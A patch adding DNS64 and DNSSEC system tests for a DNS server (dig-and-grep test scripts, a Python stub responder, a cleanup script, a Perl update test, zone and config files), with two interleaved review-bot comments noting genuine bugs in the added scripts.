@10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-excluded AAAA via CNAME lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec cname-aaaa-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA via CNAME lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec cname-excluded-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:eeee::3" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded AAAA and non-mapped A via CNAME lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec cname-excluded-bad-a.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:eeee::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA and mapped A via CNAME lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec cname-excluded-good-a.signed. 
@10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:eeee::1" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA only via CNAME lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec cname-aaaa-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A only via CNAME lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec cname-a-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 2," dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:aaaa::102:305" dig.out.ns2.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A and AAAA via CNAME lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec cname-a-and-aaaa.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::1" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-mapped A via CNAME lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec cname-a-not-mapped.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 2" dig.out.ns2.test$n > /dev/null || ret=1 +grep "CNAME a-not-mapped.signed." 
dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking NODATA AAAA via CNAME lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec cname-mx-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 2," dig.out.ns2.test$n > /dev/null || ret=1 +grep "CNAME mx-only.signed." dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-existent AAAA via CNAME lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec cname-non-existent.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 2," dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking reverse mapping ($n)" +ret=0 +$DIG $DIGOPTS -x 2001:aaaa::10.0.0.1 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep -i "CNAME.1.0.0.10.IN-ADDR.ARPA.$" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +list=`$DIG $DIGOPTS -b 10.53.0.6 @10.53.0.2 +short aaaa a-only.example | sort` +for a in $list +do + ret=0 + echo_i "checking reverse mapping of $a ($n)" + $DIG $DIGOPTS -x $a @10.53.0.2 > dig.out.ns2.test$n || ret=1 + grep -i "CNAME.5.3.2.1.IN-ADDR.ARPA." 
dig.out.ns2.test$n > /dev/null || ret=1 + n=`expr $n + 1` + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +rev=`$ARPANAME 2001:aaaa::10.0.0.1` +regex='..\(.*.IP6.ARPA\)' +rev=`expr "${rev}" : "${regex}"` +fin=`expr "${rev}" : "............${regex}"` +while test "${rev}" != "${fin}" +do + ret=0 + echo_i "checking $rev ($n)" + $DIG $DIGOPTS $rev ptr @10.53.0.2 > dig.out.ns2.test$n || ret=1 + grep -i "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 + grep -i "ANSWER: 0," dig.out.ns2.test$n > /dev/null || ret=1 + n=`expr $n + 1` + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + rev=`expr "${rev}" : "${regex}"` +done + +echo_i "checking dns64-server and dns64-contact ($n)" +ret=0 +$DIG $DIGOPTS soa 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.a.a.a.a.1.0.0.2.ip6.arpa @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep "SOA.dns64.example.net..hostmaster.example.net." dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking TTL less than 600 from zone ($n)" +ret=0 +#expect 500 +$DIG $DIGOPTS aaaa ttl-less-than-600.example +rec @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep -i "ttl-less-than-600.example..500.IN.AAAA" dig.out.ns1.test$n >/dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking TTL more than 600 from zone ($n)" +ret=0 +#expect 700 +$DIG $DIGOPTS aaaa ttl-more-than-600.example +rec @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep -i "ttl-more-than-600.example..700.IN.AAAA" dig.out.ns1.test$n >/dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking TTL less than minimum from zone ($n)" +ret=0 +#expect 1100 +$DIG $DIGOPTS aaaa ttl-less-than-minimum.example +rec @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep -i "ttl-less-than-minimum.example..1100.IN.AAAA" 
dig.out.ns1.test$n >/dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking TTL limited to minimum from zone ($n)" +ret=0 +#expect 1200 +$DIG $DIGOPTS aaaa ttl-more-than-minimum.example +rec @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep -i "ttl-more-than-minimum.example..1200.IN.AAAA" dig.out.ns1.test$n >/dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking TTL less than 600 via cache ($n)" +ret=0 +#expect 500 +$DIG $DIGOPTS aaaa ttl-less-than-600.example +rec -b 10.53.0.2 @10.53.0.2 > dig.out.ns1.test$n || ret=1 +grep -i "ttl-less-than-600.example..500.IN.AAAA" dig.out.ns1.test$n >/dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking TTL more than 600 via cache ($n)" +ret=0 +#expect 700 +$DIG $DIGOPTS aaaa ttl-more-than-600.example +rec -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep -i "ttl-more-than-600.example..700.IN.AAAA" dig.out.ns2.test$n >/dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking TTL less than minimum via cache ($n)" +ret=0 +#expect 1100 +$DIG $DIGOPTS aaaa ttl-less-than-minimum.example +rec -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep -i "ttl-less-than-minimum.example..1100.IN.AAAA" dig.out.ns2.test$n >/dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking TTL limited to minimum via cache ($n)" +ret=0 +#expect 1200 +$DIG $DIGOPTS aaaa ttl-more-than-minimum.example +rec -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep -i "ttl-more-than-minimum.example..1200.IN.AAAA" dig.out.ns2.test$n >/dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking synthesis of AAAA from 
RPZ-remapped A ($n)"
+ret=0
+$DIG $DIGOPTS aaaa rpz.example +rec -b 10.53.0.7 @10.53.0.2 > dig.out.ns2.test$n || ret=1
+grep -i 'rpz.example.*IN.AAAA.2001:96::a0a:a0a' dig.out.ns2.test$n >/dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "exit status: $status"
+[ $status -eq 0 ] || exit 1
diff --git a/bin/tests/system/dnssec/README b/bin/tests/system/dnssec/README
new file mode 100644
index 0000000..fcaa3b6
--- /dev/null
+++ b/bin/tests/system/dnssec/README
@@ -0,0 +1,32 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+SPDX-License-Identifier: MPL-2.0
+
+This Source Code Form is subject to the terms of the Mozilla Public
+License, v. 2.0. If a copy of the MPL was not distributed with this
+file, you can obtain one at https://mozilla.org/MPL/2.0/.
+
+See the COPYRIGHT file distributed with this work for additional
+information regarding copyright ownership.
+
+The test setup for the DNSSEC tests has a secure root.
+
+ns1 is the root server.
+
+ns2 and ns3 are authoritative servers for the various test domains.
+
+ns4 is a caching-only server, configured with the correct trusted key
+for the root.
+
+ns5 is a caching-only server, configured with the an incorrect trusted
+key for the root. It is used for testing failure cases.
+
+ns6 is an caching and authoritative server used for testing unusual
+server behaviors such as disabled DNSSEC algorithms.
+
+ns7 is used for checking non-cacheable answers.
+
+ns8 is a caching-only server, configured with unsupported and disabled
+algorithms. It is used for testing failure cases.
+
+ns9 is a forwarding-only server.
diff --git a/bin/tests/system/dnssec/ans10/ans.py b/bin/tests/system/dnssec/ans10/ans.py
new file mode 100644
index 0000000..dbe49e5
--- /dev/null
+++ b/bin/tests/system/dnssec/ans10/ans.py
@@ -0,0 +1,158 @@
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+from __future__ import print_function
+import os
+import sys
+import signal
+import socket
+import select
+from datetime import datetime, timedelta
+import time
+import functools
+
+import dns, dns.message, dns.query, dns.flags
+from dns.rdatatype import *
+from dns.rdataclass import *
+from dns.rcode import *
+from dns.name import *
+
+
+# Log query to file
+def logquery(type, qname):
+ with open("qlog", "a") as f:
+ f.write("%s %s\n", type, qname)
+
+
+############################################################################
+# Respond to a DNS query.
+# SOA gets a unsigned response.
+# NS gets a unsigned response.
+# DNSKEY get a unsigned NODATA response.
+# A gets a signed response.
+# All other types get a unsigned NODATA response.
+############################################################################
+def create_response(msg):
+ m = dns.message.from_wire(msg)
+ qname = m.question[0].name.to_text()
+ rrtype = m.question[0].rdtype
+ typename = dns.rdatatype.to_text(rrtype)
+
+ with open("query.log", "a") as f:
+ f.write("%s %s\n" % (typename, qname))
+ print("%s %s" % (typename, qname), end=" ")
+
+ r = dns.message.make_response(m)
+ r.set_rcode(NOERROR)
+ if rrtype == A:
+ now = datetime.today()
+ expire = now + timedelta(days=30)
+ inception = now - timedelta(days=1)
+ rrsig = (
+ "A 13 2 60 "
+ + expire.strftime("%Y%m%d%H%M%S")
+ + " "
+ + inception.strftime("%Y%m%d%H%M%S")
+ + " 12345 "
+ + qname
+ + " gB+eISXAhSPZU2i/II0W9ZUhC2SCIrb94mlNvP5092WAeXxqN/vG43/1nmDl"
+ + "y2Qs7y5VCjSMOGn85bnaMoAc7w=="
+ )
+ r.answer.append(dns.rrset.from_text(qname, 1, IN, A, "10.53.0.10"))
+ r.answer.append(dns.rrset.from_text(qname, 1, IN, RRSIG, rrsig))
+ elif rrtype == NS:
+ r.answer.append(dns.rrset.from_text(qname, 1, IN, NS, "."))
+ elif rrtype == SOA:
+ r.answer.append(dns.rrset.from_text(qname, 1, IN, SOA, ". . 0 0 0 0 0"))
+ else:
+ r.authority.append(dns.rrset.from_text(qname, 1, IN, SOA, ". . 0 0 0 0 0"))
+ r.flags |= dns.flags.AA
+ return r
+
+
+def sigterm(signum, frame):
+ print("Shutting down now...")
+ os.remove("ans.pid")
+ running = False
+ sys.exit(0)
+
+
+############################################################################
+# Main
+#
+# Set up responder and control channel, open the pid file, and start
+# the main loop, listening for queries on the query channel or commands
+# on the control channel and acting on them.
+############################################################################
+ip4 = "10.53.0.10"
+ip6 = "fd92:7065:b8e:ffff::10"
+
+try:
+ port = int(os.environ["PORT"])
+except:
+ port = 5300
+
+query4_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+query4_socket.bind((ip4, port))
+havev6 = True
+try:
+ query6_socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
+ try:
+ query6_socket.bind((ip6, port))
+ except:
+ query6_socket.close()
+ havev6 = False
+except:
+ havev6 = False
+signal.signal(signal.SIGTERM, sigterm)
+
+f = open("ans.pid", "w")
+pid = os.getpid()
+print(pid, file=f)
+f.close()
+
+running = True
+
+print("Listening on %s port %d" % (ip4, port))
+if havev6:
+ print("Listening on %s port %d" % (ip6, port))
+print("Ctrl-c to quit")
+
+if havev6:
+ input = [query4_socket, query6_socket]
+else:
+ input = [query4_socket]
+
+while running:
+ try:
+ inputready, outputready, exceptready = select.select(input, [], [])
+ except select.error as e:
+ break
+ except socket.error as e:
+ break
+ except KeyboardInterrupt:
+ break
+
+ for s in inputready:
+ if s == query4_socket or s == query6_socket:
+ print(
+ "Query received on %s" % (ip4 if s == query4_socket else ip6), end=" "
+ )
+ # Handle incoming queries
+ msg = s.recvfrom(65535)
+ rsp = create_response(msg[0])
+ if rsp:
+ print(dns.rcode.to_text(rsp.rcode()))
+ s.sendto(rsp.to_wire(), msg[1])
+ else:
+ print("NO RESPONSE")
+ if not running:
+ break
diff --git a/bin/tests/system/dnssec/clean.sh b/bin/tests/system/dnssec/clean.sh
new file mode 100644
index 0000000..28e72ba
--- /dev/null
+++ b/bin/tests/system/dnssec/clean.sh
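Review bot: `logquery()` near the top of ans.py calls `f.write("%s %s\n", type, qname)`, which passes three arguments to `write()` and would raise TypeError on first use; it should format with `%` the way `create_response()` does, `f.write("%s %s\n" % (type, qname))`, or be removed, since nothing visible in this file calls it and `create_response()` already logs to `query.log`. In `sigterm()`, `running = False` has no `global running`, so it only binds a local and the loop flag is never cleared; shutdown works solely because `sys.exit(0)` follows. `create_response()` also indexes `m.question[0]` and calls `dns.message.from_wire(msg)` with no exception handling, so a malformed or question-less datagram would presumably terminate the responder mid-test even though the main loop has a "NO RESPONSE" branch for a falsy result; wrapping the parse in `try`/`except` and returning `None` would let that branch do its job.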
@@ -0,0 +1,116 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+set -e
+
+rm -f ./*/K* ./*/keyset-* ./*/dsset-* ./*/signedkey-* ./*/*.signed
+rm -f ./*/example.bk
+rm -f ./*/named.conf
+rm -f ./*/named.memstats
+rm -f ./*/named.run ./*/named.run.prev
+rm -f ./*/named.secroots
+rm -f ./*/tmp* ./*/*.jnl ./*/*.bk ./*/*.jbk
+rm -f ./*/trusted.conf ./*/managed.conf ./*/revoked.conf
+rm -f ./Kexample.* ./Kkeygen* ./keygen*.err
+rm -f ./ans10/query.log ./ans10/ans.run
+rm -f ./canonical?.*
+rm -f ./delv.out*
+rm -f ./delve.out*
+rm -f ./dig.out.*
+rm -f ./ns2/too-many-iterations.db
+rm -f ./dnssectools.out*
+rm -f ./dsfromkey.out.*
+rm -f ./keygen.err
+rm -f ./named.secroots.test*
+rm -f ./nosign.before
+rm -f ./ns*/*.nta
+rm -f ./ns*/managed-keys.bind ./ns*/managed-keys.bind.jnl ./ns*/*.mkeys*
+rm -f ./ns*/named.lock
+rm -f ./ns1/managed.key.id
+rm -f ./ns1/root.db ./ns2/example.db ./ns2/managed.db ./ns2/trusted.db
+rm -f ./ns1/trusted.keys
+rm -f ./ns2/algroll.db
+rm -f ./ns2/badparam.db ./ns2/badparam.db.bad
+rm -f ./ns2/cdnskey-kskonly.secure.db
+rm -f ./ns2/cdnskey-kskonly.secure.id
+rm -f ./ns2/cdnskey-update.secure.db
+rm -f ./ns2/cdnskey-x.secure.db
+rm -f ./ns2/cdnskey.secure.db
+rm -f ./ns2/cds-auto.secure.db ./ns2/cds-auto.secure.db.jnl
+rm -f ./ns2/cds-kskonly.secure.db
+rm -f ./ns2/cds-kskonly.secure.id
+rm -f ./ns2/cds-update.secure.db ./ns2/cds-update.secure.db.jnl
+rm -f ./ns2/cds.secure.db ./ns2/cds-x.secure.db
+rm -f ./ns2/in-addr.arpa.db
+rm -f ./ns2/nsec3chain-test.db
+rm -f ./ns2/single-nsec3.db
+rm -f ./ns2/updatecheck-kskonly.secure.*
+rm -f ./ns3/auto-nsec.example.db ./ns3/auto-nsec3.example.db
+rm -f ./ns3/badds.example.db
+rm -f ./ns3/dname-at-apex-nsec3.example.db
+rm -f ./ns3/dnskey-nsec3-unknown.example.db
+rm -f ./ns3/dnskey-nsec3-unknown.example.db.tmp
+rm -f ./ns3/dnskey-unknown.example.db
+rm -f ./ns3/dnskey-unknown.example.db.tmp
+rm -f ./ns3/dnskey-unsupported-2.example.db
+rm -f ./ns3/dnskey-unsupported-2.example.db.tmp
+rm -f ./ns3/dnskey-unsupported.example.db
+rm -f ./ns3/dnskey-unsupported.example.db.tmp
+rm -f ./ns3/dynamic.example.db ./ns3/dynamic.example.db.signed.jnl
+rm -f ./ns3/expired.example.db ./ns3/update-nsec3.example.db
+rm -f ./ns3/expiring.example.db ./ns3/nosign.example.db
+rm -f ./ns3/future.example.db ./ns3/trusted-future.key
+rm -f ./ns3/inline.example.db.signed
+rm -f ./ns3/kskonly.example.db
+rm -f ./ns3/lower.example.db ./ns3/upper.example.db ./ns3/upper.example.db.lower
+rm -f ./ns3/managed-future.example.db
+rm -f ./ns3/multiple.example.db ./ns3/nsec3-unknown.example.db ./ns3/nsec3.example.db
+rm -f ./ns3/nsec3.nsec3.example.db
+rm -f ./ns3/nsec3.optout.example.db
+rm -f ./ns3/occluded.example.db
+rm -f ./ns3/optout-unknown.example.db ./ns3/optout.example.db
+rm -f ./ns3/optout.nsec3.example.db
+rm -f ./ns3/optout.optout.example.db
+rm -f ./ns3/publish-inactive.example.db
+rm -f ./ns3/revkey.example.db
+rm -f ./ns3/rsasha256.example.db ./ns3/rsasha512.example.db
+rm -f ./ns3/secure.below-cname.example.db
+rm -f ./ns3/secure.example.db ./ns3/*.managed.db ./ns3/*.trusted.db
+rm -f ./ns3/secure.nsec3.example.db
+rm -f ./ns3/secure.optout.example.db
+rm -f ./ns3/siginterval.conf
+rm -f ./ns3/siginterval.example.db
+rm -f ./ns3/split-dnssec.example.db
+rm -f ./ns3/split-smart.example.db
+rm -f ./ns3/ttlpatch.example.db ./ns3/ttlpatch.example.db.signed
+rm -f ./ns3/ttlpatch.example.db.patched
+rm -f ./ns3/unsecure.example.db ./ns3/bogus.example.db ./ns3/keyless.example.db
+rm -f ./ns3/unsupported.managed.db.tmp ./ns3/unsupported.trusted.db.tmp
+rm -f ./ns4/named_dump.db*
+rm -f ./ns6/optout-tld.db
+rm -f ./ns7/multiple.example.bk ./ns7/nsec3.example.bk ./ns7/optout.example.bk
+rm -f ./ns7/split-rrsig.db ./ns7/split-rrsig.db.unsplit
+rm -f ./nsupdate.out*
+rm -f ./python.out.*
+rm -f ./rndc.out.*
+rm -f ./signer/*.db
+rm -f ./signer/*.signed.post*
+rm -f ./signer/*.signed.pre*
+rm -f ./signer/example.db.after ./signer/example.db.before
+rm -f ./signer/example.db.changed
+rm -f ./signer/general/dsset*
+rm -f ./signer/general/signed.zone
+rm -f ./signer/general/signer.out.*
+rm -f ./signer/nsec3param.out
+rm -f ./signer/signer.out.*
+rm -f ./signing.out*
diff --git a/bin/tests/system/dnssec/dnssec_update_test.pl b/bin/tests/system/dnssec/dnssec_update_test.pl
new file mode 100644
index 0000000..a06c563
--- /dev/null
+++ b/bin/tests/system/dnssec/dnssec_update_test.pl
@@ -0,0 +1,99 @@
+#!/usr/bin/perl
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+#
+# DNSSEC Dynamic update test suite.
+#
+# Usage:
+#
+# perl update_test.pl [-s server] [-p port] zone
+#
+# The server defaults to 127.0.0.1.
+# The port defaults to 53.
+#
+# Installation notes:
+#
+# This program uses the Net::DNS::Resolver module.
+# You can install it by saying
+#
+# perl -MCPAN -e "install Net::DNS"
+#
+
+use Getopt::Std;
+use Net::DNS;
+use Net::DNS::Update;
+use Net::DNS::Resolver;
+
+$opt_s = "127.0.0.1";
+$opt_p = 53;
+
+getopt('s:p:');
+
+$res = new Net::DNS::Resolver;
+$res->nameservers($opt_s);
+$res->port($opt_p);
+$res->defnames(0); # Do not append default domain.
+
+@ARGV == 1 or die
+ "usage: perl update_test.pl [-s server] [-p port] zone\n";
+
+$zone = shift @ARGV;
+
+my $failures = 0;
+
+sub assert {
+ my ($cond, $explanation) = @_;
+ if (!$cond) {
+ print "Test Failed: $explanation ***\n";
+ $failures++
+ }
+}
+
+sub test {
+ my ($expected, @records) = @_;
+
+ my $update = new Net::DNS::Update("$zone");
+
+ foreach $rec (@records) {
+ $update->push(@$rec);
+ }
+
+ $reply = $res->send($update);
+
+ # Did it work?
+ if (defined $reply) {
+ my $rcode = $reply->header->rcode;
+ assert($rcode eq $expected, "expected $expected, got $rcode");
+ } else {
+ print "Update failed: ", $res->errorstring, "\n";
+ }
+}
+
+sub section {
+ my ($msg) = @_;
+ print "$msg\n";
+}
+
+section("Add a name");
+test("NOERROR", ["update", rr_add("a.$zone 300 A 73.80.65.49")]);
+
+section("Delete the name");
+test("NOERROR", ["update", rr_del("a.$zone")]);
+
+if ($failures) {
+ print "$failures update tests failed.\n";
+} else {
+ print "All update tests successful.\n";
+}
+
+exit $failures;
diff --git a/bin/tests/system/dnssec/ns1/named.conf.in b/bin/tests/system/dnssec/ns1/named.conf.in
new file mode 100644
index 0000000..bd1ccc4
--- /dev/null
+++ b/bin/tests/system/dnssec/ns1/named.conf.in
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS1
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ dnssec-validation yes;
+ /* test that we can turn off trust-anchor-telemetry */
+ trust-anchor-telemetry no;
+};
+
+zone "." {
+ type primary;
+ file "root.db.signed";
+};
+
+include "trusted.conf";
diff --git a/bin/tests/system/dnssec/ns1/root.db.in b/bin/tests/system/dnssec/ns1/root.db.in
new file mode 100644
index 0000000..526e36c
--- /dev/null
+++ b/bin/tests/system/dnssec/ns1/root.db.in
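Review bot: In `test()` of dnssec_update_test.pl, the `else` branch for an undefined `$reply` only prints "Update failed" and never touches `$failures`, so a run in which the server is unreachable or every update times out still reports "All update tests successful." and exits 0. Adding `$failures++;` after that `print` keeps the exit status truthful for whatever harness consumes it. The option parsing also looks unintended: `getopt('s:p:')` uses the colon syntax of `getopts`, while Getopt::Std's `getopt` expects bare switch letters (`getopt('sp')`); it appears to work only because every listed character is treated as an argument-taking switch. The usage string and header comment name `update_test.pl` although the file is added as `dnssec_update_test.pl`.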
@@ -0,0 +1,37 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+. IN SOA gson.nominum.com. a.root.servers.nil. (
+ 2000042100 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+. NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
+
+example. NS ns2.example.
+ns2.example. A 10.53.0.2
+algroll. NS ns2.algroll.
+ns2.algroll. A 10.53.0.2
+managed. NS ns2.managed.
+ns2.managed. A 10.53.0.2
+trusted. NS ns2.trusted.
+ns2.trusted. A 10.53.0.2
+optout-tld NS ns6.optout-tld.
+ns6.optout-tld. A 10.53.0.6
+in-addr.arpa. NS ns2.example.
+inprogress. NS ns10.inprogress.
+ns10.inprogress. A 10.53.0.10
+too-many-iterations. NS ns2.too-many-iterations.
+ns2.too-many-iterations. A 10.53.0.2
diff --git a/bin/tests/system/dnssec/ns1/sign.sh b/bin/tests/system/dnssec/ns1/sign.sh
new file mode 100644
index 0000000..563dc96
--- /dev/null
+++ b/bin/tests/system/dnssec/ns1/sign.sh
@@ -0,0 +1,62 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. "$SYSTEMTESTTOP/conf.sh"
+
+set -e
+
+zone=.
+infile=root.db.in
+zonefile=root.db
+
+(cd ../ns2 && $SHELL sign.sh )
+(cd ../ns6 && $SHELL sign.sh )
+(cd ../ns7 && $SHELL sign.sh )
+
+echo_i "ns1/sign.sh"
+
+cp "../ns2/dsset-example$TP" .
+cp "../ns2/dsset-in-addr.arpa$TP" .
+cp "../ns2/dsset-too-many-iterations$TP" .
+
+grep "$DEFAULT_ALGORITHM_NUMBER [12] " "../ns2/dsset-algroll$TP" > "dsset-algroll$TP"
+cp "../ns6/dsset-optout-tld$TP" .
+
+ksk=$("$KEYGEN" -q -fk -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone")
